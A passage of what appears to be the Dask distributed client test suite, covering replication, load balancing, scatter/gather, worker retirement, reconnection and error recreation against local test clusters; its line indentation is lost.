assert len(s.tasks[x.key].who_has) == 3
assert len(s.tasks[y.key].who_has) == 3
yield c.replicate([x, y])
s.validate_state()
assert len(s.tasks[x.key].who_has) == 10
assert len(s.tasks[y.key].who_has) == 10
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster(
client=True,
nthreads=[("127.0.0.1", 1), ("127.0.0.2", 1), ("127.0.0.2", 1)],
timeout=None,
)
def test_client_replicate_host(client, s, a, b, c):
aws = s.workers[a.address]
bws = s.workers[b.address]
cws = s.workers[c.address]
x = client.submit(inc, 1, workers="127.0.0.2")
yield wait([x])
assert s.tasks[x.key].who_has == {bws} or s.tasks[x.key].who_has == {cws}
yield client.replicate([x], workers=["127.0.0.2"])
assert s.tasks[x.key].who_has == {bws, cws}
yield client.replicate([x], workers=["127.0.0.1"])
assert s.tasks[x.key].who_has == {aws, bws, cws}
def test_client_replicate_sync(c):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
c.replicate([x, y], n=2)
who_has = c.who_has()
assert len(who_has[x.key]) == len(who_has[y.key]) == 2
with pytest.raises(ValueError):
c.replicate([x], n=0)
assert y.result() == 3
@pytest.mark.skipif(WINDOWS, reason="Windows timer too coarse-grained")
@gen_cluster(client=True, nthreads=[("127.0.0.1", 4)] * 1)
def test_task_load_adapts_quickly(c, s, a):
future = c.submit(slowinc, 1, delay=0.2) # slow
yield wait(future)
assert 0.15 < s.task_duration["slowinc"] < 0.4
futures = c.map(slowinc, range(10), delay=0) # very fast
yield wait(futures)
assert 0 < s.task_duration["slowinc"] < 0.1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 2)
def test_even_load_after_fast_functions(c, s, a, b):
x = c.submit(inc, 1, workers=a.address) # very fast
y = c.submit(inc, 2, workers=b.address) # very fast
yield wait([x, y])
futures = c.map(inc, range(2, 11))
yield wait(futures)
assert any(f.key in a.data for f in futures)
assert any(f.key in b.data for f in futures)
# assert abs(len(a.data) - len(b.data)) <= 3
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 2)
def test_even_load_on_startup(c, s, a, b):
x, y = c.map(inc, [1, 2])
yield wait([x, y])
assert len(a.data) == len(b.data) == 1
@pytest.mark.skip
@gen_cluster(client=True, nthreads=[("127.0.0.1", 2)] * 2)
def test_contiguous_load(c, s, a, b):
w, x, y, z = c.map(inc, [1, 2, 3, 4])
yield wait([w, x, y, z])
groups = [set(a.data), set(b.data)]
assert {w.key, x.key} in groups
assert {y.key, z.key} in groups
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
def test_balanced_with_submit(c, s, *workers):
L = [c.submit(slowinc, i) for i in range(4)]
yield wait(L)
for w in workers:
assert len(w.data) == 1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
def test_balanced_with_submit_and_resident_data(c, s, *workers):
[x] = yield c.scatter([10], broadcast=True)
L = [c.submit(slowinc, x, pure=False) for i in range(4)]
yield wait(L)
for w in workers:
assert len(w.data) == 2
@gen_cluster(client=True, nthreads=[("127.0.0.1", 20)] * 2)
def test_scheduler_saturates_cores(c, s, a, b):
for delay in [0, 0.01, 0.1]:
futures = c.map(slowinc, range(100), delay=delay)
futures = c.map(slowinc, futures, delay=delay / 10)
while not s.tasks:
if s.tasks:
assert all(
len(p) >= 20
for w in s.workers.values()
for p in w.processing.values()
)
yield gen.sleep(0.01)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 20)] * 2)
def test_scheduler_saturates_cores_random(c, s, a, b):
for delay in [0, 0.01, 0.1]:
futures = c.map(randominc, range(100), scale=0.1)
while not s.tasks:
if s.tasks:
assert all(
len(p) >= 20
for w in s.workers.values()
for p in w.processing.values()
)
yield gen.sleep(0.01)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
def test_cancel_clears_processing(c, s, *workers):
da = pytest.importorskip("dask.array")
x = c.submit(slowinc, 1, delay=0.2)
while not s.tasks:
yield gen.sleep(0.01)
yield c.cancel(x)
start = time()
while any(v for w in s.workers.values() for v in w.processing):
assert time() < start + 0.2
yield gen.sleep(0.01)
s.validate_state()
def test_default_get():
with cluster() as (s, [a, b]):
pre_get = dask.base.get_scheduler()
pytest.raises(KeyError, dask.config.get, "shuffle")
with Client(s["address"], set_as_default=True) as c:
assert dask.base.get_scheduler() == c.get
assert dask.config.get("shuffle") == "tasks"
assert dask.base.get_scheduler() == pre_get
pytest.raises(KeyError, dask.config.get, "shuffle")
c = Client(s["address"], set_as_default=False)
assert dask.base.get_scheduler() == pre_get
pytest.raises(KeyError, dask.config.get, "shuffle")
c.close()
c = Client(s["address"], set_as_default=True)
assert dask.config.get("shuffle") == "tasks"
assert dask.base.get_scheduler() == c.get
c.close()
assert dask.base.get_scheduler() == pre_get
pytest.raises(KeyError, dask.config.get, "shuffle")
with Client(s["address"]) as c:
assert dask.base.get_scheduler() == c.get
with Client(s["address"], set_as_default=False) as c:
assert dask.base.get_scheduler() != c.get
assert dask.base.get_scheduler() != c.get
with Client(s["address"], set_as_default=True) as c1:
assert dask.base.get_scheduler() == c1.get
with Client(s["address"], set_as_default=True) as c2:
assert dask.base.get_scheduler() == c2.get
assert dask.base.get_scheduler() == c1.get
assert dask.base.get_scheduler() == pre_get
@gen_cluster(client=True)
def test_get_processing(c, s, a, b):
processing = yield c.processing()
assert processing == valmap(tuple, s.processing)
futures = c.map(
slowinc, range(10), delay=0.1, workers=[a.address], allow_other_workers=True
)
yield gen.sleep(0.2)
x = yield c.processing()
assert set(x) == {a.address, b.address}
x = yield c.processing(workers=[a.address])
assert isinstance(x[a.address], (list, tuple))
@gen_cluster(client=True)
def test_get_foo(c, s, a, b):
futures = c.map(inc, range(10))
yield wait(futures)
x = yield c.scheduler.ncores()
assert x == s.nthreads
x = yield c.scheduler.ncores(workers=[a.address])
assert x == {a.address: s.nthreads[a.address]}
x = yield c.scheduler.has_what()
assert valmap(sorted, x) == valmap(sorted, s.has_what)
x = yield c.scheduler.has_what(workers=[a.address])
assert valmap(sorted, x) == {a.address: sorted(s.has_what[a.address])}
x = yield c.scheduler.nbytes(summary=False)
assert x == s.get_nbytes(summary=False)
x = yield c.scheduler.nbytes(keys=[futures[0].key], summary=False)
assert x == {futures[0].key: s.tasks[futures[0].key].nbytes}
x = yield c.scheduler.who_has()
assert valmap(sorted, x) == valmap(sorted, s.who_has)
x = yield c.scheduler.who_has(keys=[futures[0].key])
assert valmap(sorted, x) == {futures[0].key: sorted(s.who_has[futures[0].key])}
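# Compare two mappings of iterables key by key, independent of container type.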
def assert_dict_key_equal(expected, actual):
assert set(expected.keys()) == set(actual.keys())
for k in actual.keys():
ev = expected[k]
av = actual[k]
assert list(ev) == list(av)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 3)
def test_get_foo_lost_keys(c, s, u, v, w):
x = c.submit(inc, 1, workers=[u.address])
y = yield c.scatter(3, workers=[v.address])
yield wait([x, y])
ua, va, wa = u.address, v.address, w.address
d = yield c.scheduler.has_what()
assert_dict_key_equal(d, {ua: [x.key], va: [y.key], wa: []})
d = yield c.scheduler.has_what(workers=[ua, va])
assert_dict_key_equal(d, {ua: [x.key], va: [y.key]})
d = yield c.scheduler.who_has()
assert_dict_key_equal(d, {x.key: [ua], y.key: [va]})
d = yield c.scheduler.who_has(keys=[x.key, y.key])
assert_dict_key_equal(d, {x.key: [ua], y.key: [va]})
yield u.close()
yield v.close()
d = yield c.scheduler.has_what()
assert_dict_key_equal(d, {wa: []})
d = yield c.scheduler.has_what(workers=[ua, va])
assert_dict_key_equal(d, {ua: [], va: []})
# The scattered key cannot be recomputed so it is forgotten
d = yield c.scheduler.who_has()
assert_dict_key_equal(d, {x.key: []})
# ... but when passed explicitly, it is included in the result
d = yield c.scheduler.who_has(keys=[x.key, y.key])
assert_dict_key_equal(d, {x.key: [], y.key: []})
@pytest.mark.slow
@gen_cluster(
client=True,
Worker=Nanny,
worker_kwargs={"death_timeout": "500ms"},
clean_kwargs={"threads": False, "processes": False},
)
def test_bad_tasks_fail(c, s, a, b):
f = c.submit(sys.exit, 0)
with pytest.raises(KilledWorker) as info:
yield f
assert info.value.last_worker.nanny in {a.address, b.address}
yield [a.close(), b.close()]
def test_get_processing_sync(c, s, a, b):
processing = c.processing()
assert not any(v for v in processing.values())
futures = c.map(
slowinc, range(10), delay=0.1, workers=[a["address"]], allow_other_workers=False
)
sleep(0.2)
aa = a["address"]
bb = b["address"]
processing = c.processing()
assert set(c.processing(aa)) == {aa}
assert set(c.processing([aa])) == {aa}
c.cancel(futures)
def test_close_idempotent(c):
c.close()
c.close()
c.close()
@nodebug
def test_get_returns_early(c):
start = time()
with ignoring(RuntimeError):
result = c.get({"x": (throws, 1), "y": (sleep, 1)}, ["x", "y"])
assert time() < start + 0.5
# Futures should be released and forgotten
wait_for(lambda: not c.futures, timeout=0.1)
wait_for(lambda: not any(c.processing().values()), timeout=3)
x = c.submit(inc, 1)
x.result()
with ignoring(RuntimeError):
result = c.get({"x": (throws, 1), x.key: (inc, 1)}, ["x", x.key])
assert x.key in c.futures
@pytest.mark.slow
@gen_cluster(Worker=Nanny, client=True)
def test_Client_clears_references_after_restart(c, s, a, b):
x = c.submit(inc, 1)
assert x.key in c.refcount
yield c.restart()
assert x.key not in c.refcount
key = x.key
del x
import gc
gc.collect()
yield gen.moment
assert key not in c.refcount
def test_get_stops_work_after_error(c):
with pytest.raises(RuntimeError):
c.get({"x": (throws, 1), "y": (sleep, 1.5)}, ["x", "y"])
start = time()
while any(c.processing().values()):
sleep(0.01)
assert time() < start + 0.5
def test_as_completed_list(c):
seq = c.map(inc, range(5))
seq2 = list(as_completed(seq))
assert set(c.gather(seq2)) == {1, 2, 3, 4, 5}
def test_as_completed_results(c):
seq = c.map(inc, range(5))
seq2 = list(as_completed(seq, with_results=True))
assert set(pluck(1, seq2)) == {1, 2, 3, 4, 5}
assert set(pluck(0, seq2)) == set(seq)
@pytest.mark.parametrize("with_results", [True, False])
def test_as_completed_batches(c, with_results):
n = 50
futures = c.map(slowinc, range(n), delay=0.01)
out = []
for batch in as_completed(futures, with_results=with_results).batches():
assert isinstance(batch, (tuple, list))
sleep(0.05)
out.extend(batch)
assert len(out) == n
if with_results:
assert set(pluck(1, out)) == set(range(1, n + 1))
else:
assert set(out) == set(futures)
def test_as_completed_next_batch(c):
futures = c.map(slowinc, range(2), delay=0.1)
ac = as_completed(futures)
assert not ac.is_empty()
assert ac.next_batch(block=False) == []
assert set(ac.next_batch(block=True)).issubset(futures)
while not ac.is_empty():
assert set(ac.next_batch(block=True)).issubset(futures)
assert ac.is_empty()
assert not ac.has_ready()
@gen_test()
def test_status():
s = yield Scheduler(port=0)
c = yield Client(s.address, asynchronous=True)
assert c.status == "running"
x = c.submit(inc, 1)
yield c.close()
assert c.status == "closed"
yield s.close()
@gen_cluster(client=True)
def test_persist_optimize_graph(c, s, a, b):
i = 10
for method in [c.persist, c.compute]:
b = db.range(i, npartitions=2)
i += 1
b2 = b.map(inc)
b3 = b2.map(inc)
b4 = method(b3, optimize_graph=False)
yield wait(b4)
assert set(map(tokey, b3.__dask_keys__())).issubset(s.tasks)
b = db.range(i, npartitions=2)
i += 1
b2 = b.map(inc)
b3 = b2.map(inc)
b4 = method(b3, optimize_graph=True)
yield wait(b4)
assert not any(tokey(k) in s.tasks for k in b2.__dask_keys__())
@gen_cluster(client=True, nthreads=[])
def test_scatter_raises_if_no_workers(c, s):
with pytest.raises(gen.TimeoutError):
yield c.scatter(1, timeout=0.5)
@pytest.mark.slow
def test_reconnect(loop):
w = Worker("127.0.0.1", 9393, loop=loop)
loop.add_callback(w.start)
scheduler_cli = [
"dask-scheduler",
"--host",
"127.0.0.1",
"--port",
"9393",
"--no-dashboard",
]
with popen(scheduler_cli) as s:
c = Client("127.0.0.1:9393", loop=loop)
start = time()
while len(c.nthreads()) != 1:
sleep(0.1)
assert time() < start + 3
x = c.submit(inc, 1)
assert x.result() == 2
start = time()
while c.status != "connecting":
assert time() < start + 5
sleep(0.01)
with pytest.raises(Exception):
c.nthreads()
assert x.status == "cancelled"
with pytest.raises(CancelledError):
x.result()
with popen(scheduler_cli) as s:
start = time()
while c.status != "running":
sleep(0.1)
assert time() < start + 5
start = time()
while len(c.nthreads()) != 1:
sleep(0.05)
assert time() < start + 15
x = c.submit(inc, 1)
assert x.result() == 2
start = time()
while True:
try:
x.result()
assert False
except CommClosedError:
continue
except CancelledError:
break
assert time() < start + 5
sleep(0.1)
sync(loop, w.close)
c.close()
@gen_cluster(client=True, nthreads=[], client_kwargs={"timeout": 0.5})
def test_reconnect_timeout(c, s):
with captured_logger(logging.getLogger("distributed.client")) as logger:
yield s.close()
start = time()
while c.status != "closed":
yield c._update_scheduler_info()
yield gen.sleep(0.05)
assert time() < start + 5, "Timeout waiting for reconnect to fail"
text = logger.getvalue()
assert "Failed to reconnect" in text
@pytest.mark.slow
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
@pytest.mark.skipif(
sys.version_info[0] == 2, reason="Semaphore.acquire doesn't support timeout option"
)
# @pytest.mark.xfail(reason="TODO: intermittent failures")
@pytest.mark.parametrize("worker,count,repeat", [(Worker, 100, 5), (Nanny, 10, 20)])
def test_open_close_many_workers(loop, worker, count, repeat):
psutil = pytest.importorskip("psutil")
proc = psutil.Process()
with cluster(nworkers=0, active_rpc_timeout=2) as (s, _):
gc.collect()
before = proc.num_fds()
done = Semaphore(0)
running = weakref.WeakKeyDictionary()
workers = set()
status = True
@gen.coroutine
def start_worker(sleep, duration, repeat=1):
for i in range(repeat):
yield gen.sleep(sleep)
if not status:
return
w = worker(s["address"], loop=loop)
running[w] = None
workers.add(w)
yield w
addr = w.worker_address
running[w] = addr
yield gen.sleep(duration)
yield w.close()
del w
yield gen.moment
done.release()
for i in range(count):
loop.add_callback(
start_worker, random.random() / 5, random.random() / 5, repeat=repeat
)
with Client(s["address"], loop=loop) as c:
sleep(1)
for i in range(count):
done.acquire(timeout=5)
gc.collect()
if not running:
break
start = time()
while c.nthreads():
sleep(0.2)
assert time() < start + 10
status = False
[c.sync(w.close) for w in list(workers)]
for w in workers:
assert w.status == "closed"
start = time()
while proc.num_fds() > before:
print("fds:", before, proc.num_fds())
sleep(0.1)
assert time() < start + 10
@gen_cluster(client=False, timeout=None)
def test_idempotence(s, a, b):
c = yield Client(s.address, asynchronous=True)
f = yield Client(s.address, asynchronous=True)
# Submit
x = c.submit(inc, 1)
yield x
log = list(s.transition_log)
len_single_submit = len(log) # see last assert
y = f.submit(inc, 1)
assert x.key == y.key
yield y
yield gen.sleep(0.1)
log2 = list(s.transition_log)
assert log == log2
# Error
a = c.submit(div, 1, 0)
yield wait(a)
assert a.status == "error"
log = list(s.transition_log)
b = f.submit(div, 1, 0)
assert a.key == b.key
yield wait(b)
yield gen.sleep(0.1)
log2 = list(s.transition_log)
assert log == log2
s.transition_log.clear()
# Simultaneous Submit
d = c.submit(inc, 2)
e = c.submit(inc, 2)
yield wait([d, e])
assert len(s.transition_log) == len_single_submit
yield c.close()
yield f.close()
def test_scheduler_info(c):
info = c.scheduler_info()
assert isinstance(info, dict)
assert len(info["workers"]) == 2
def test_write_scheduler_file(c):
info = c.scheduler_info()
with tmpfile("json") as scheduler_file:
c.write_scheduler_file(scheduler_file)
with Client(scheduler_file=scheduler_file) as c2:
info2 = c2.scheduler_info()
assert c.scheduler.address == c2.scheduler.address
# test that a ValueError is raised if the scheduler_file
# attribute is already set
with pytest.raises(ValueError):
c.write_scheduler_file(scheduler_file)
def test_get_versions(c):
requests = pytest.importorskip("requests")
v = c.get_versions()
assert v["scheduler"] is not None
assert v["client"] is not None
assert len(v["workers"]) == 2
for k, v in v["workers"].items():
assert v is not None
c.get_versions(check=True)
    # Smoke test: requesting versions for an extra package should not raise
v = c.get_versions(packages=["requests"])
assert dict(v["client"]["packages"]["optional"])["requests"] == requests.__version__
def test_threaded_get_within_distributed(c):
import dask.multiprocessing
for get in [dask.local.get_sync, dask.multiprocessing.get, dask.threaded.get]:
def f():
return get({"x": (lambda: 1,)}, "x")
future = c.submit(f)
assert future.result() == 1
@gen_cluster(client=True)
def test_lose_scattered_data(c, s, a, b):
[x] = yield c.scatter([1], workers=a.address)
yield a.close()
yield gen.sleep(0.1)
assert x.status == "cancelled"
assert x.key not in s.tasks
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 3)
def test_partially_lose_scattered_data(e, s, a, b, c):
x = yield e.scatter(1, workers=a.address)
yield e.replicate(x, n=2)
yield a.close()
yield gen.sleep(0.1)
assert x.status == "finished"
assert s.get_task_status(keys=[x.key]) == {x.key: "memory"}
@gen_cluster(client=True)
def test_scatter_compute_lose(c, s, a, b):
[x] = yield c.scatter([[1, 2, 3, 4]], workers=a.address)
y = c.submit(inc, 1, workers=b.address)
z = c.submit(slowadd, x, y, delay=0.2)
yield gen.sleep(0.1)
yield a.close()
with pytest.raises(CancelledError):
yield wait(z)
assert x.status == "cancelled"
assert y.status == "finished"
assert z.status == "cancelled"
@gen_cluster(client=True)
def test_scatter_compute_store_lose(c, s, a, b):
"""
Create irreplaceable data on one machine,
cause a dependent computation to occur on another and complete
Kill the machine with the irreplaceable data. What happens to the complete
result? How about after it GCs and tries to come back?
"""
x = yield c.scatter(1, workers=a.address)
xx = c.submit(inc, x, workers=a.address)
y = c.submit(inc, 1)
z = c.submit(slowadd, xx, y, delay=0.2, workers=b.address)
yield wait(z)
yield a.close()
start = time()
while x.status == "finished":
yield gen.sleep(0.01)
assert time() < start + 2
# assert xx.status == 'finished'
assert y.status == "finished"
assert z.status == "finished"
zz = c.submit(inc, z)
yield wait(zz)
zkey = z.key
del z
start = time()
while s.get_task_status(keys=[zkey]) != {zkey: "released"}:
yield gen.sleep(0.01)
assert time() < start + 2
xxkey = xx.key
del xx
start = time()
while x.key in s.tasks and zkey not in s.tasks and xxkey not in s.tasks:
yield gen.sleep(0.01)
assert time() < start + 2
@gen_cluster(client=True)
def test_scatter_compute_store_lose_processing(c, s, a, b):
"""
Create irreplaceable data on one machine,
cause a dependent computation to occur on another and complete
Kill the machine with the irreplaceable data. What happens to the complete
result? How about after it GCs and tries to come back?
"""
[x] = yield c.scatter([1], workers=a.address)
y = c.submit(slowinc, x, delay=0.2)
z = c.submit(inc, y)
yield gen.sleep(0.1)
yield a.close()
start = time()
while x.status == "finished":
yield gen.sleep(0.01)
assert time() < start + 2
assert y.status == "cancelled"
assert z.status == "cancelled"
@gen_cluster(client=False)
def test_serialize_future(s, a, b):
c = yield Client(s.address, asynchronous=True)
f = yield Client(s.address, asynchronous=True)
future = c.submit(lambda: 1)
result = yield future
with temp_default_client(f):
future2 = pickle.loads(pickle.dumps(future))
assert future2.client is f
assert tokey(future2.key) in f.futures
result2 = yield future2
assert result == result2
yield c.close()
yield f.close()
@gen_cluster(client=False)
def test_temp_client(s, a, b):
c = yield Client(s.address, asynchronous=True)
f = yield Client(s.address, asynchronous=True)
with temp_default_client(c):
assert default_client() is c
assert default_client(f) is f
with temp_default_client(f):
assert default_client() is f
assert default_client(c) is c
yield c.close()
yield f.close()
@nodebug # test timing is fragile
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
def test_persist_workers(e, s, a, b, c):
L1 = [delayed(inc)(i) for i in range(4)]
total = delayed(sum)(L1)
L2 = [delayed(add)(i, total) for i in L1]
total2 = delayed(sum)(L2)
out = e.persist(
L1 + L2 + [total, total2],
workers={
tuple(L1): a.address,
total: b.address,
tuple(L2): [c.address],
total2: b.address,
},
allow_other_workers=L2 + [total2],
)
yield wait(out)
assert all(v.key in a.data for v in L1)
assert total.key in b.data
assert s.loose_restrictions == {total2.key} | {v.key for v in L2}
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
def test_compute_workers(e, s, a, b, c):
L1 = [delayed(inc)(i) for i in range(4)]
total = delayed(sum)(L1)
L2 = [delayed(add)(i, total) for i in L1]
out = e.compute(
L1 + L2 + [total],
workers={tuple(L1): a.address, total: b.address, tuple(L2): [c.address]},
allow_other_workers=L1 + [total],
)
yield wait(out)
for v in L1:
assert s.worker_restrictions[v.key] == {a.address}
for v in L2:
assert s.worker_restrictions[v.key] == {c.address}
assert s.worker_restrictions[total.key] == {b.address}
assert s.loose_restrictions == {total.key} | {v.key for v in L1}
@gen_cluster(client=True)
def test_compute_nested_containers(c, s, a, b):
da = pytest.importorskip("dask.array")
np = pytest.importorskip("numpy")
x = da.ones(10, chunks=(5,)) + 1
future = c.compute({"x": [x], "y": 123})
result = yield future
assert isinstance(result, dict)
assert (result["x"][0] == np.ones(10) + 1).all()
assert result["y"] == 123
def test_get_restrictions():
L1 = [delayed(inc)(i) for i in range(4)]
total = delayed(sum)(L1)
L2 = [delayed(add)(i, total) for i in L1]
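    # get_restrictions normalizes the various workers= forms (single address,
    # list, or mapping) into {key: [addresses]} plus the loosely-restricted keys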
r1, loose = Client.get_restrictions(L2, "127.0.0.1", False)
assert r1 == {d.key: ["127.0.0.1"] for d in L2}
assert not loose
r1, loose = Client.get_restrictions(L2, ["127.0.0.1"], True)
assert r1 == {d.key: ["127.0.0.1"] for d in L2}
assert set(loose) == {d.key for d in L2}
r1, loose = Client.get_restrictions(L2, {total: "127.0.0.1"}, True)
assert r1 == {total.key: ["127.0.0.1"]}
assert loose == [total.key]
r1, loose = Client.get_restrictions(L2, {(total,): "127.0.0.1"}, True)
assert r1 == {total.key: ["127.0.0.1"]}
assert loose == [total.key]
@gen_cluster(client=True)
def test_scatter_type(c, s, a, b):
[future] = yield c.scatter([1])
assert future.type == int
d = yield c.scatter({"x": 1.0})
assert d["x"].type == float
@gen_cluster(client=True)
def test_retire_workers_2(c, s, a, b):
[x] = yield c.scatter([1], workers=a.address)
yield s.retire_workers(workers=[a.address])
assert b.data == {x.key: 1}
assert s.who_has == {x.key: {b.address}}
assert s.has_what == {b.address: {x.key}}
assert a.address not in s.workers
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
def test_retire_many_workers(c, s, *workers):
futures = yield c.scatter(list(range(100)))
yield s.retire_workers(workers=[w.address for w in workers[:7]])
results = yield c.gather(futures)
assert results == list(range(100))
assert len(s.has_what) == len(s.nthreads) == 3
assert all(future.done() for future in futures)
assert all(s.tasks[future.key].state == "memory" for future in futures)
for w, keys in s.has_what.items():
assert 15 < len(keys) < 50
@gen_cluster(client=True, nthreads=[("127.0.0.1", 3)] * 2)
def test_weight_occupancy_against_data_movement(c, s, a, b):
s.extensions["stealing"]._pc.callback_time = 1000000
s.task_duration["f"] = 0.01
def f(x, y=0, z=0):
sleep(0.01)
return x
y = yield c.scatter([[1, 2, 3, 4]], workers=[a.address])
z = yield c.scatter([1], workers=[b.address])
futures = c.map(f, [1, 2, 3, 4], y=y, z=z)
yield wait(futures)
assert sum(f.key in a.data for f in futures) >= 2
assert sum(f.key in b.data for f in futures) >= 1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1), ("127.0.0.1", 10)])
def test_distribute_tasks_by_nthreads(c, s, a, b):
s.task_duration["f"] = 0.01
s.extensions["stealing"]._pc.callback_time = 1000000
def f(x, y=0):
sleep(0.01)
return x
y = yield c.scatter([1], broadcast=True)
futures = c.map(f, range(20), y=y)
yield wait(futures)
assert len(b.data) > 2 * len(a.data)
@gen_cluster(client=True, clean_kwargs={"threads": False})
def test_add_done_callback(c, s, a, b):
S = set()
def f(future):
future.add_done_callback(g)
def g(future):
S.add((future.key, future.status))
u = c.submit(inc, 1, key="u")
v = c.submit(throws, "hello", key="v")
w = c.submit(slowinc, 2, delay=0.3, key="w")
x = c.submit(inc, 3, key="x")
u.add_done_callback(f)
v.add_done_callback(f)
w.add_done_callback(f)
yield wait((u, v, w, x))
x.add_done_callback(f)
t = time()
while len(S) < 4 and time() - t < 2.0:
yield gen.sleep(0.01)
assert S == {(f.key, f.status) for f in (u, v, w, x)}
@gen_cluster(client=True)
def test_normalize_collection(c, s, a, b):
x = delayed(inc)(1)
y = delayed(inc)(x)
z = delayed(inc)(y)
yy = c.persist(y)
zz = c.normalize_collection(z)
assert len(z.dask) == len(y.dask) + 1
assert isinstance(zz.dask[y.key], Future)
assert len(zz.dask) < len(z.dask)
@gen_cluster(client=True)
def test_normalize_collection_dask_array(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones(10, chunks=(5,))
y = x + 1
yy = c.persist(y)
z = y.sum()
zdsk = dict(z.dask)
zz = c.normalize_collection(z)
assert z.dask == zdsk # do not mutate input
assert len(z.dask) > len(zz.dask)
assert any(isinstance(v, Future) for v in zz.dask.values())
for k, v in yy.dask.items():
assert zz.dask[k].key == v.key
result1 = yield c.compute(z)
result2 = yield c.compute(zz)
assert result1 == result2
@pytest.mark.slow
def test_normalize_collection_with_released_futures(c):
da = pytest.importorskip("dask.array")
x = da.arange(2 ** 20, chunks=2 ** 10)
y = x.persist()
wait(y)
sol = y.sum().compute()
# Start releasing futures
del y
# Try to reuse futures. Previously this was a race condition,
# and the call to `.compute()` would error out due to missing
# futures on the scheduler at compute time.
normalized = c.normalize_collection(x)
res = normalized.sum().compute()
assert res == sol
@gen_cluster(client=True)
def test_auto_normalize_collection(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones(10, chunks=5)
assert len(x.dask) == 2
with dask.config.set(optimizations=[c._optimize_insert_futures]):
y = x.map_blocks(slowinc, delay=1, dtype=x.dtype)
yy = c.persist(y)
yield wait(yy)
start = time()
future = c.compute(y.sum())
yield future
end = time()
assert end - start < 1
start = time()
z = c.persist(y + 1)
yield wait(z)
end = time()
assert end - start < 1
def test_auto_normalize_collection_sync(c):
da = pytest.importorskip("dask.array")
x = da.ones(10, chunks=5)
y = x.map_blocks(slowinc, delay=1, dtype=x.dtype)
yy = c.persist(y)
wait(yy)
with dask.config.set(optimizations=[c._optimize_insert_futures]):
start = time()
y.sum().compute()
end = time()
assert end - start < 1
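# A "memory" -> "released" transition that simultaneously recommends the same
# key back to "waiting" would mean completed data was lost and rescheduled;
# the transition log must never contain such an entry.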
def assert_no_data_loss(scheduler):
for key, start, finish, recommendations, _ in scheduler.transition_log:
if start == "memory" and finish == "released":
for k, v in recommendations.items():
assert not (k == key and v == "waiting")
@gen_cluster(client=True, timeout=None)
def test_interleave_computations(c, s, a, b):
import distributed
distributed.g = s
xs = [delayed(slowinc)(i, delay=0.02) for i in range(30)]
ys = [delayed(slowdec)(x, delay=0.02) for x in xs]
zs = [delayed(slowadd)(x, y, delay=0.02) for x, y in zip(xs, ys)]
total = delayed(sum)(zs)
future = c.compute(total)
done = ("memory", "released")
yield gen.sleep(0.1)
x_keys = [x.key for x in xs]
y_keys = [y.key for y in ys]
z_keys = [z.key for z in zs]
while not s.tasks or any(w.processing for w in s.workers.values()):
yield gen.sleep(0.05)
x_done = sum(state in done for state in s.get_task_status(keys=x_keys).values())
y_done = sum(state in done for state in s.get_task_status(keys=y_keys).values())
z_done = sum(state in done for state in s.get_task_status(keys=z_keys).values())
assert x_done >= y_done >= z_done
assert x_done < y_done + 10
assert y_done < z_done + 10
assert_no_data_loss(s)
@pytest.mark.skip(reason="Now prefer first-in-first-out")
@gen_cluster(client=True, timeout=None)
def test_interleave_computations_map(c, s, a, b):
xs = c.map(slowinc, range(30), delay=0.02)
ys = c.map(slowdec, xs, delay=0.02)
zs = c.map(slowadd, xs, ys, delay=0.02)
done = ("memory", "released")
x_keys = [x.key for x in xs]
y_keys = [y.key for y in ys]
z_keys = [z.key for z in zs]
while not s.tasks or any(w.processing for w in s.workers.values()):
yield gen.sleep(0.05)
x_done = sum(state in done for state in s.get_task_status(keys=x_keys).values())
y_done = sum(state in done for state in s.get_task_status(keys=y_keys).values())
z_done = sum(state in done for state in s.get_task_status(keys=z_keys).values())
assert x_done >= y_done >= z_done
assert x_done < y_done + 10
assert y_done < z_done + 10
@gen_cluster(client=True)
def test_scatter_dict_workers(c, s, a, b):
yield c.scatter({"a": 10}, workers=[a.address, b.address])
assert "a" in a.data or "a" in b.data
@pytest.mark.slow
@gen_test()
def test_client_timeout():
c = Client("127.0.0.1:57484", asynchronous=True)
s = Scheduler(loop=c.loop, port=57484)
yield gen.sleep(4)
try:
yield s
except EnvironmentError: # port in use
yield c.close()
return
start = time()
yield c
try:
assert time() < start + 2
finally:
yield c.close()
yield s.close()
@gen_cluster(client=True)
def test_submit_list_kwargs(c, s, a, b):
futures = yield c.scatter([1, 2, 3])
def f(L=None):
return sum(L)
future = c.submit(f, L=futures)
result = yield future
assert result == 1 + 2 + 3
@gen_cluster(client=True)
def test_map_list_kwargs(c, s, a, b):
futures = yield c.scatter([1, 2, 3])
def f(i, L=None):
return i + sum(L)
futures = c.map(f, range(10), L=futures)
results = yield c.gather(futures)
assert results == [i + 6 for i in range(10)]
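# Dropping the last client-side reference to a scattered value must not
# delete it while a dependent task is still waiting on it.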
@gen_cluster(client=True)
def test_dont_clear_waiting_data(c, s, a, b):
start = time()
x = yield c.scatter(1)
y = c.submit(slowinc, x, delay=0.5)
while y.key not in s.tasks:
yield gen.sleep(0.01)
key = x.key
del x
for i in range(5):
assert s.waiting_data[key]
yield gen.moment
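# The _get_futures_error / _recreate_error_locally tests cover the client
# machinery that pulls a failed task's function and arguments back so the
# exception can be reproduced (and debugged) in the local process.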
@gen_cluster(client=True)
def test_get_future_error_simple(c, s, a, b):
f = c.submit(div, 1, 0)
yield wait(f)
assert f.status == "error"
function, args, kwargs, deps = yield c._get_futures_error(f)
# args contains only solid values, not keys
assert function.__name__ == "div"
with pytest.raises(ZeroDivisionError):
function(*args, **kwargs)
@gen_cluster(client=True)
def test_get_futures_error(c, s, a, b):
x0 = delayed(dec)(2, dask_key_name="x0")
